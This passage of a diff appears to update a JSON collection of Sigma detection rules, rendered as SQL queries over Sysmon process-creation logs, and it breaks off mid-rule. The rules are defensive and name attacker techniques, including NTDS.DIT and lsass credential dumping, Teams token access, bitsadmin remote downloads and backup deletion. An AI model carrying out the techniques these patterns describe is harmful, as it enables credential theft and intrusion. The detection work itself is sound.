(EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" }, { - "title": "Suspicious Usage Of ShellExec_RunDLL", - "id": "d87bd452-6da1-456e-8155-7dc988157b7d", + "title": "File Download Via Bitsadmin To An Uncommon Target Folder", + "id": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", "status": "experimental", - "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" + "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" }, { - "title": "Potential File Overwrite Via Sysinternals SDelete", - "id": "a4824fca-976f-4964-b334-0621379e84c4", - "status": "experimental", - "description": "Detects the use of SDelete to erase a file not the free space", - "author": "frack113", + "title": "TAIDOOR RAT DLL Load", + "id": "d1aa3382-abab-446f-96ea-4de52908210b", + "status": "test", + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1485" + "attack.execution", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_sdelete.yml" + "filename": "proc_creation_win_apt_taidoor.yml" }, { - "title": "PUA - Advanced Port Scanner Execution", - "id": "54773c5f-f1cc-4703-9126-2f797d96a69d", - "status": "experimental", - "description": "Detects the use of Advanced Port Scanner.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote Access Tool - ScreenConnect Suspicious Execution", + "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "status": "test", + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1046", - "attack.t1135" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Legitimate administrative use", - "Tools with similar commandline (very rare)" + "Legitimate use by administrative staff" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\advanced\\_port\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_port\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced Port Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_advanced_port_scanner.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" }, { - "title": "SystemStateBackup Deleted Using Wbadmin.EXE", - "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "title": "Invoke-Obfuscation STDIN+ Launcher", + "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", "status": "test", - "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", - "author": "frack113", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" }, { - "title": "Suspicious Command With Teams Objects Paths", - "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "title": "Suspicious Process Patterns NTDS.DIT Exfil", + "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1528" + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR Image LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\apache%' ESCAPE '\\' OR Image LIKE '%\\\\tomcat%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" + "filename": "proc_creation_win_susp_ntds.yml" }, { - "title": "Suspicious Firewall Configuration Discovery Via Netsh.EXE", - "id": "0e4164da-94bc-450d-a7be-a4b176179f1f", + "title": "CMD Shell Output Redirect", + "id": "4f4eaa9f-5ad4-410c-a4be-bc6132b0175a", "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "description": "Detects the use of the redirection character \">\" to redicrect information in commandline", + "author": "frack113", "tags": [ "attack.discovery", - "attack.t1016" + "attack.t1082" ], "falsepositives": [ - "Administrative activity" + "Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%netsh %' ESCAPE '\\' AND CommandLine LIKE '%show %' ESCAPE '\\' AND CommandLine LIKE '%firewall %' ESCAPE '\\' AND (CommandLine LIKE '%config %' ESCAPE '\\' OR CommandLine LIKE '%state %' ESCAPE '\\' OR CommandLine LIKE '%rule %' ESCAPE '\\' OR CommandLine LIKE '%name=all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR CommandLine LIKE '%chrome-extension://%' ESCAPE '\\' OR CommandLine LIKE '%\\\\.\\\\pipe\\\\chrome.nativeMessaging%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_netsh_fw_rules_discovery.yml" + "filename": "proc_creation_win_cmd_redirect.yml" }, { - "title": "PUA - Seatbelt Execution", - "id": "38646daa-e78f-4ace-9de0-55547b2d30da", + "title": "Suspicious High IntegrityLevel Conhost Legacy Option", + "id": "3037d961-21e9-4732-b27a-637bcc7bf539", "status": "experimental", - "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1526", - "attack.t1087", - "attack.t1083" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Very Likely, including launching cmd.exe via Run As Administrator" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel = 'High' AND CommandLine LIKE '%conhost.exe%' ESCAPE '\\' AND CommandLine LIKE '%0xffffffff%' ESCAPE '\\' AND CommandLine LIKE '%-ForceV1%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_seatbelt.yml" + "filename": "proc_creation_win_conhost_legacy_option.yml" }, { - "title": "Persistence Via TypedPaths - CommandLine", - "id": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "title": "Stop Windows Service Via PowerShell Stop-Service", + "id": "c49c5062-0966-4170-9efd-9968c913a6cf", "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the stopping of a Windows service", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND CommandLine LIKE '%Stop-Service %' ESCAPE '\\')" ], - "filename": "proc_creation_win_registry_typed_paths_persistence.yml" + "filename": "proc_creation_win_powershell_stop_service.yml" }, { - "title": "DLL Sideloading by VMware Xfer Utility", - "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "title": "Suspicious Group And Account Reconnaissance Activity Using Net.EXE", + "id": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", "status": "experimental", - "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", + "author": "Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002" ], "falsepositives": [ - "Unlikely" + "Inventory tool runs", + "Administrative activity" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((((CommandLine LIKE '% group %' ESCAPE '\\' OR CommandLine LIKE '% localgroup %' ESCAPE '\\') AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\' OR CommandLine LIKE '% /do%' ESCAPE '\\')) AND NOT (CommandLine LIKE '% /add%' ESCAPE '\\')) OR (CommandLine LIKE '% accounts %' ESCAPE '\\' AND CommandLine LIKE '% /do%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_net_groups_and_accounts_recon.yml" + }, + { + "title": "Suspicious PowerShell Child Processes", + "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", + "status": "experimental", + "description": "Detects suspicious child processes spawned by PowerShell", + "author": "Florian Roth (Nextron Systems), Tim Shelton", + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" + "filename": "proc_creation_win_powershell_susp_child_processes.yml" }, { - "title": "Netsh Allow Group Policy on Microsoft Defender Firewall", - "id": "347906f3-e207-4d18-ae5b-a9403d6bcdef", + "title": "Fake Instance Of Hxtsr.exe", + "id": "4e762605-34a8-406d-b72e-c1a089313320", "status": "test", - "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", - "author": "frack113", + "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.\nHxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\nIts path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\".\nAny instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe\n", + "author": "Sreeman", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1036" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%group=%' ESCAPE '\\' AND CommandLine LIKE '%new%' ESCAPE '\\' AND CommandLine LIKE '%enable=Yes%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image = 'hxtsr.exe' AND NOT (CurrentDirectory LIKE 'C:\\\\program files\\\\windowsapps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND CurrentDirectory LIKE '%\\\\hxtsr.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml" + "filename": "proc_creation_win_hxtsr_masquerading.yml" }, { - "title": "Greedy File Deletion Using Del", - "id": "204b17ae-4007-471b-917b-b917b315c5db", + "title": "Remote File Download via Desktopimgdownldr Utility", + "id": "214641c2-c579-4ecb-8427-0cf19df6842e", "status": "experimental", - "description": "Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.", - "author": "frack113", + "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\\\*.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\*.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND CommandLine LIKE '%/lockscreenurl:http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_del_greedy_deletion.yml" + "filename": "proc_creation_win_desktopimgdownldr_remote_file_download.yml" }, { - "title": "HackTool - Dumpert Process Dumper Execution", - "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", - "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "title": "HackTool - SysmonEOP Execution", + "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "status": "experimental", + "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "cve.2022.41120", + "attack.t1068", + "attack.privilege_escalation" ], "falsepositives": [ - "Very unlikely" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" ], - "filename": "proc_creation_win_hktl_dumpert.yml" + "filename": "proc_creation_win_hktl_sysmoneop.yml" }, { - "title": "Suspicious Execution of Systeminfo", - "id": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", - "status": "experimental", - "description": "Detects usage of the \"systeminfo\" command to retrieve information", - "author": "frack113", + "title": "Potential Dtrack RAT Activity", + "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "status": "stable", + "description": "Detects potential Dtrack RAT activity via specific process patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR OriginalFileName = 'sysinfo.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_systeminfo_execution.yml" + "filename": "proc_creation_win_malware_dtrack.yml" }, { - "title": "Suspicious Execution of Hostname", - "id": "7be5fb68-f9ef-476d-8b51-0256ebece19e", - "status": "test", - "description": "Use of hostname to get information", + "title": "Suspicious Powercfg Execution To Change Lock Screen Timeout", + "id": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", + "status": "experimental", + "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\HOSTNAME.EXE' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\powercfg.exe' ESCAPE '\\' OR OriginalFileName = 'PowerCfg.exe') AND ((CommandLine LIKE '%/setacvalueindex %' ESCAPE '\\' AND CommandLine LIKE '%SCHEME\\_CURRENT%' ESCAPE '\\' AND CommandLine LIKE '%SUB\\_VIDEO%' ESCAPE '\\' AND CommandLine LIKE '%VIDEOCONLOCK%' ESCAPE '\\') OR (CommandLine LIKE 